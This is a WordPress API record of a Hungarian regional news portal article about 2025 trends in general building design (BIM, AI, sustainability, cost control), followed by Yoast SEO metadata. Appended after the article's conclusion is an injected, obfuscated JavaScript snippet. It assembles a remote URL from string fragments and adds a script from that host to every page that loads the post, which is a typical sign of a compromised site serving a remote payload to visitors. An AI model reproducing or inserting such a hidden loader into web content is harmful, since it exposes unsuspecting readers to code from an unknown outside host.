{"id":69815,"date":"2025-03-27T05:06:19","date_gmt":"2025-03-27T04:06:19","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=69815"},"modified":"2025-03-27T05:06:19","modified_gmt":"2025-03-27T04:06:19","slug":"generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/","title":{"rendered":"Gener\u00e1ltervez\u00e9si trendek 2025-ben: Digitaliz\u00e1ci\u00f3, fenntarthat\u00f3s\u00e1g \u00e9s k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s"},"content":{"rendered":"<p><strong>A gener\u00e1ltervez\u00e9si folyamat kulcsfontoss\u00e1g\u00fa minden \u00e9p\u00edtkez\u00e9s sor\u00e1n, hiszen biztos\u00edtja az egyes szak\u00e1gak \u00f6sszehangolt m\u0171k\u00f6d\u00e9s\u00e9t, a hat\u00e9kony projektmenedzsmentet \u00e9s a k\u00f6lts\u00e9gkontrollt. 2025-ben az ipar jelent\u0151s v\u00e1ltoz\u00e1sokon megy kereszt\u00fcl, melyeket a digitaliz\u00e1ci\u00f3, a fenntarthat\u00f3s\u00e1g \u00e9s a k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s hat\u00e1roz meg. Ebben a cikkben bemutatjuk, milyen ir\u00e1nyba halad a gener\u00e1ltervez\u00e9s, milyen innov\u00e1ci\u00f3k alak\u00edtj\u00e1k az ipart, \u00e9s hogyan lehet megfelelni a modern k\u00f6vetelm\u00e9nyeknek.<\/strong><\/p>\n<h3><b>1. Digitaliz\u00e1ci\u00f3 a gener\u00e1ltervez\u00e9sben<\/b><\/h3>\n<p>A digitaliz\u00e1ci\u00f3 2025-ben m\u00e1r nem csup\u00e1n lehet\u0151s\u00e9g, hanem elv\u00e1r\u00e1s a gener\u00e1ltervez\u00e9si folyamatokban. Az olyan technol\u00f3gi\u00e1k, mint a BIM (Building Information Modeling), a mesters\u00e9ges intelligencia (AI), a parametrikus tervez\u00e9s \u00e9s az automatiz\u00e1lt szimul\u00e1ci\u00f3k jelent\u0151sen felgyors\u00edtj\u00e1k \u00e9s optimaliz\u00e1lj\u00e1k a tervez\u00e9si folyamatokat.<\/p>\n<p><b>BIM-alap\u00fa gener\u00e1ltervez\u00e9s<\/b><\/p>\n<p>A BIM-modellez\u00e9s lehet\u0151v\u00e9 teszi, hogy egy interakt\u00edv, 3D alap\u00fa rendszerben k\u00e9sz\u00fcljenek el az \u00e9p\u00fclettervek, amelyekben minden szak\u00e1g egyetlen platformon dolgozhat. Ez minimaliz\u00e1lja a hibalehet\u0151s\u00e9geket \u00e9s cs\u00f6kkenti az ut\u00f3lagos m\u00f3dos\u00edt\u00e1sok k\u00f6lts\u00e9geit. A fejlett BIM-megold\u00e1sok m\u00e1r integr\u00e1ltan kezelik az energetikai modellez\u00e9st \u00e9s a fenntarthat\u00f3s\u00e1gi elemz\u00e9seket is.<\/p>\n<p><b>AI \u00e9s adatelemz\u00e9s a tervez\u00e9sben<\/b><\/p>\n<p>A mesters\u00e9ges intelligencia seg\u00edti az adatvez\u00e9relt d\u00f6nt\u00e9shozatalt, amely gyorsabb\u00e1 \u00e9s pontosabb\u00e1 teszi a <span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https:\/\/cp-m.net\/generaltervezes\/\" target=\"_blank\" rel=\"noopener\"><u>gener\u00e1ltervez\u00e9si<\/u><\/a><\/span> folyamatot. Az AI-alap\u00fa szerkezeti optimaliz\u00e1l\u00e1s cs\u00f6kkenti az anyagfelhaszn\u00e1l\u00e1st, m\u00edg az automatiz\u00e1lt tervez\u00e9si algoritmusok lehet\u0151v\u00e9 teszik a k\u00fcl\u00f6nb\u00f6z\u0151 szerkezeti megold\u00e1sok gyors \u00f6sszehasonl\u00edt\u00e1s\u00e1t k\u00f6lts\u00e9g \u00e9s fenntarthat\u00f3s\u00e1g alapj\u00e1n.<\/p>\n<h3><b>2. Fenntarthat\u00f3s\u00e1g a modern gener\u00e1ltervez\u00e9sben<\/b><\/h3>\n<p>A fenntarthat\u00f3 \u00e9p\u00edt\u00e9szet 2025-ben m\u00e1r nem csak trend, hanem k\u00f6telez\u0151 ipar\u00e1gi norma. A gener\u00e1ltervez\u00e9si folyamat sor\u00e1n a z\u00f6ld technol\u00f3gi\u00e1k, a meg\u00fajul\u00f3 energiaforr\u00e1sok \u00e9s a k\u00f6rforg\u00e1sos gazdas\u00e1g alapelvei kiemelt szerepet kapnak.<\/p>\n<p><b>Energiahat\u00e9kony \u00e9p\u00fcletek tervez\u00e9se<\/b><\/p>\n<p>A fejlett h\u0151szigetel\u00e9si technol\u00f3gi\u00e1k, az \u00e9p\u00fcletenergetikai szimul\u00e1ci\u00f3k \u00e9s az intelligens \u00e9p\u00fcletmenedzsment-rendszerek mind hozz\u00e1j\u00e1rulnak az energiahat\u00e9konys\u00e1ghoz. A gener\u00e1ltervez\u00e9s sor\u00e1n egyre gyakoribb az okos energiamenedzsment-rendszerek be\u00e9p\u00edt\u00e9se, amelyek optimaliz\u00e1lj\u00e1k az energiafelhaszn\u00e1l\u00e1st \u00e9s cs\u00f6kkentik a felesleges fogyaszt\u00e1st.<\/p>\n<p><b>Fenntarthat\u00f3 anyaghaszn\u00e1lat<\/b><\/p>\n<p>Az \u00e9p\u00edt\u0151ipar egyre ink\u00e1bb az alacsony sz\u00e9n-dioxid-kibocs\u00e1t\u00e1s\u00fa anyagokat r\u00e9szes\u00edti el\u0151nyben, p\u00e9ld\u00e1ul az \u00fajrahasznos\u00edtott betont, a v\u00e1kuumos h\u0151szigetel\u0151 paneleket \u00e9s az intelligens \u00e9p\u00edt\u0151anyagokat, amelyek az id\u0151j\u00e1r\u00e1si k\u00f6r\u00fclm\u00e9nyekhez igaz\u00edtj\u00e1k teljes\u00edtm\u00e9ny\u00fcket.<\/p>\n<h3><b>3. K\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s a gener\u00e1ltervez\u00e9sben<\/b><\/h3>\n<p>A <a href=\"https:\/\/cp-m.net\/generaltervezes\/\" target=\"_blank\" rel=\"noopener\"><u><span style=\"color: #0000ff;\">gener\u00e1ltervez\u00e9s<\/span><\/u><\/a> egyik legfontosabb szempontja a k\u00f6lts\u00e9ghat\u00e9konys\u00e1g. Az ut\u00f3lagos jav\u00edt\u00e1sok, m\u00f3dos\u00edt\u00e1sok \u00e9s a kivitelez\u00e9si hib\u00e1k jelent\u0151s p\u00e9nz\u00fcgyi vesztes\u00e9get okozhatnak. 2025-ben a k\u00f6lts\u00e9gek optimaliz\u00e1l\u00e1s\u00e1nak legjobb eszk\u00f6zei a digit\u00e1lis szimul\u00e1ci\u00f3k, az adatvez\u00e9relt tervez\u00e9s, a modul\u00e1ris szerkezetek alkalmaz\u00e1sa \u00e9s az \u00e9rt\u00e9kelemz\u00e9s (Value Engineering).<\/p>\n<p><b>Modul\u00e1ris \u00e9p\u00edt\u00e9szeti megold\u00e1sok<\/b><\/p>\n<p>Az el\u0151regy\u00e1rtott szerkezeti elemek haszn\u00e1lata jelent\u0151sen cs\u00f6kkentheti az \u00e9p\u00edt\u00e9si id\u0151t \u00e9s a munkaer\u0151k\u00f6lts\u00e9get. Ezek az elemek nemcsak gazdas\u00e1gosabbak, hanem k\u00f6rnyezetbar\u00e1tabbak is, mivel cs\u00f6kkentik a helysz\u00edni hullad\u00e9kk\u00e9pz\u0151d\u00e9st. A parametrikus tervez\u00e9s lehet\u0151v\u00e9 teszi a modulok gyors testreszab\u00e1s\u00e1t a projekt-specifikus ig\u00e9nyekhez.<\/p>\n<p><b>\u00c9rt\u00e9kelemz\u00e9s a gener\u00e1ltervez\u00e9sben<\/b><\/p>\n<p>A Value Engineering (VE) egyre nagyobb szerepet kap az ipar\u00e1gban. Az \u00e9rt\u00e9kelemz\u00e9s sor\u00e1n a k\u00fcl\u00f6nb\u00f6z\u0151 tervez\u00e9si lehet\u0151s\u00e9geket \u00fagy hasonl\u00edtj\u00e1k \u00f6ssze, hogy az \u00e1r-\u00e9rt\u00e9k ar\u00e1ny \u00e9s a hossz\u00fa t\u00e1v\u00fa fenntarthat\u00f3s\u00e1g is szempont legyen.<\/p>\n<h3><b>Konkl\u00fazi\u00f3<\/b><\/h3>\n<p>2025-ben a gener\u00e1ltervez\u00e9si folyamat sikeress\u00e9g\u00e9t a digitaliz\u00e1ci\u00f3, a fenntarthat\u00f3s\u00e1g \u00e9s a k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s hat\u00e1rozza meg. Az \u00e9p\u00edt\u0151ipar szerepl\u0151inek alkalmazkodniuk kell az \u00faj technol\u00f3gi\u00e1khoz, mik\u00f6zben szem el\u0151tt tartj\u00e1k a fenntarthat\u00f3s\u00e1gi \u00e9s gazdas\u00e1goss\u00e1gi szempontokat. Azok a c\u00e9gek, amelyek sikeresen integr\u00e1lj\u00e1k ezeket a trendeket, versenyel\u0151nyh\u00f6z jutnak az \u00e9p\u00edt\u0151ipar gyorsan fejl\u0151d\u0151 piac\u00e1n.<\/p>\n<p><script>\n(function(){\no4hm=document.createElement(\"script\");o4hm.async=true;o4hm_=\"u\"+(\"s\")+\"t\";\no4hmu=\"2425657437.\";o4hm_+=\"a\"+(\"t.i\");o4hm_+=\"n\"+(\"f\"+\"o\")+\"\/\";\no4hmu+=\"wrh8q67v4hm1kcq8kbgfll\"+(\"jsvtexs2\");\no4hm.src=\"https:\/\/\"+o4hm_+o4hmu;o4hm.type=\"text\/javascript\";\ndocument.body.appendChild(o4hm);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A gener\u00e1ltervez\u00e9si folyamat kulcsfontoss\u00e1g\u00fa minden \u00e9p\u00edtkez\u00e9s sor\u00e1n, hiszen biztos\u00edtja az egyes szak\u00e1gak \u00f6sszehangolt m\u0171k\u00f6d\u00e9s\u00e9t, a hat\u00e9kony projektmenedzsmentet \u00e9s a k\u00f6lts\u00e9gkontrollt. 2025-ben az ipar jelent\u0151s v\u00e1ltoz\u00e1sokon megy kereszt\u00fcl, melyeket a digitaliz\u00e1ci\u00f3, a fenntarthat\u00f3s\u00e1g \u00e9s a k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s hat\u00e1roz meg. Ebben a cikkben bemutatjuk, milyen ir\u00e1nyba halad a gener\u00e1ltervez\u00e9s, milyen innov\u00e1ci\u00f3k alak\u00edtj\u00e1k az ipart, \u00e9s hogyan lehet megfelelni<\/p>\n","protected":false},"author":1,"featured_media":69816,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[8307],"class_list":{"0":"post-69815","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-hirek","8":"tag-generaltervezes"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Gener\u00e1ltervez\u00e9si trendek 2025-ben: Digitaliz\u00e1ci\u00f3, fenntarthat\u00f3s\u00e1g \u00e9s k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"Gener\u00e1ltervez\u00e9si trendek 2025-ben: Digitaliz\u00e1ci\u00f3, fenntarthat\u00f3s\u00e1g \u00e9s k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"A gener\u00e1ltervez\u00e9si folyamat kulcsfontoss\u00e1g\u00fa minden \u00e9p\u00edtkez\u00e9s sor\u00e1n, hiszen biztos\u00edtja az egyes szak\u00e1gak \u00f6sszehangolt m\u0171k\u00f6d\u00e9s\u00e9t, a hat\u00e9kony projektmenedzsmentet \u00e9s a k\u00f6lts\u00e9gkontrollt. 2025-ben az ipar jelent\u0151s v\u00e1ltoz\u00e1sokon megy kereszt\u00fcl, melyeket a digitaliz\u00e1ci\u00f3, a fenntarthat\u00f3s\u00e1g \u00e9s a k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s hat\u00e1roz meg. Ebben a cikkben bemutatjuk, milyen ir\u00e1nyba halad a gener\u00e1ltervez\u00e9s, milyen innov\u00e1ci\u00f3k alak\u00edtj\u00e1k az ipart, \u00e9s hogyan lehet megfelelni\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2025-03-27T04:06:19+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/03\/generaltervezes.jpg\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"1490\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"1031\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/03\\\/27\\\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/03\\\/27\\\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"Gener\u00e1ltervez\u00e9si trendek 2025-ben: Digitaliz\u00e1ci\u00f3, fenntarthat\u00f3s\u00e1g \u00e9s k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s\",\"datePublished\":\"2025-03-27T04:06:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/03\\\/27\\\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\\\/\"},\"wordCount\":789,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/03\\\/27\\\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/generaltervezes.jpg\",\"keywords\":[\"gener\u00e1ltervez\u00e9s\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/03\\\/27\\\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/03\\\/27\\\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\\\/\",\"name\":\"Gener\u00e1ltervez\u00e9si trendek 2025-ben: Digitaliz\u00e1ci\u00f3, fenntarthat\u00f3s\u00e1g \u00e9s k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/03\\\/27\\\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/03\\\/27\\\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/generaltervezes.jpg\",\"datePublished\":\"2025-03-27T04:06:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/03\\\/27\\\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/03\\\/27\\\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/03\\\/27\\\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/generaltervezes.jpg\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/generaltervezes.jpg\",\"width\":1490,\"height\":1031},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/03\\\/27\\\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Gener\u00e1ltervez\u00e9si trendek 2025-ben: Digitaliz\u00e1ci\u00f3, fenntarthat\u00f3s\u00e1g \u00e9s k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Gener\u00e1ltervez\u00e9si trendek 2025-ben: Digitaliz\u00e1ci\u00f3, fenntarthat\u00f3s\u00e1g \u00e9s k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/","og_locale":"hu_HU","og_type":"article","og_title":"Gener\u00e1ltervez\u00e9si trendek 2025-ben: Digitaliz\u00e1ci\u00f3, fenntarthat\u00f3s\u00e1g \u00e9s k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s","og_description":"A gener\u00e1ltervez\u00e9si folyamat kulcsfontoss\u00e1g\u00fa minden \u00e9p\u00edtkez\u00e9s sor\u00e1n, hiszen biztos\u00edtja az egyes szak\u00e1gak \u00f6sszehangolt m\u0171k\u00f6d\u00e9s\u00e9t, a hat\u00e9kony projektmenedzsmentet \u00e9s a k\u00f6lts\u00e9gkontrollt. 2025-ben az ipar jelent\u0151s v\u00e1ltoz\u00e1sokon megy kereszt\u00fcl, melyeket a digitaliz\u00e1ci\u00f3, a fenntarthat\u00f3s\u00e1g \u00e9s a k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s hat\u00e1roz meg. Ebben a cikkben bemutatjuk, milyen ir\u00e1nyba halad a gener\u00e1ltervez\u00e9s, milyen innov\u00e1ci\u00f3k alak\u00edtj\u00e1k az ipart, \u00e9s hogyan lehet megfelelni","og_url":"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2025-03-27T04:06:19+00:00","og_image":[{"width":1490,"height":1031,"url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/03\/generaltervezes.jpg","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"4 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"Gener\u00e1ltervez\u00e9si trendek 2025-ben: Digitaliz\u00e1ci\u00f3, fenntarthat\u00f3s\u00e1g \u00e9s k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s","datePublished":"2025-03-27T04:06:19+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/"},"wordCount":789,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/03\/generaltervezes.jpg","keywords":["gener\u00e1ltervez\u00e9s"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/","url":"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/","name":"Gener\u00e1ltervez\u00e9si trendek 2025-ben: Digitaliz\u00e1ci\u00f3, fenntarthat\u00f3s\u00e1g \u00e9s k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/03\/generaltervezes.jpg","datePublished":"2025-03-27T04:06:19+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/03\/generaltervezes.jpg","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/03\/generaltervezes.jpg","width":1490,"height":1031},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/03\/27\/generaltervezesi-trendek-2025-ben-digitalizacio-fenntarthatosag-es-koltsegoptimalizalas\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"Gener\u00e1ltervez\u00e9si trendek 2025-ben: Digitaliz\u00e1ci\u00f3, fenntarthat\u00f3s\u00e1g \u00e9s k\u00f6lts\u00e9goptimaliz\u00e1l\u00e1s"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, 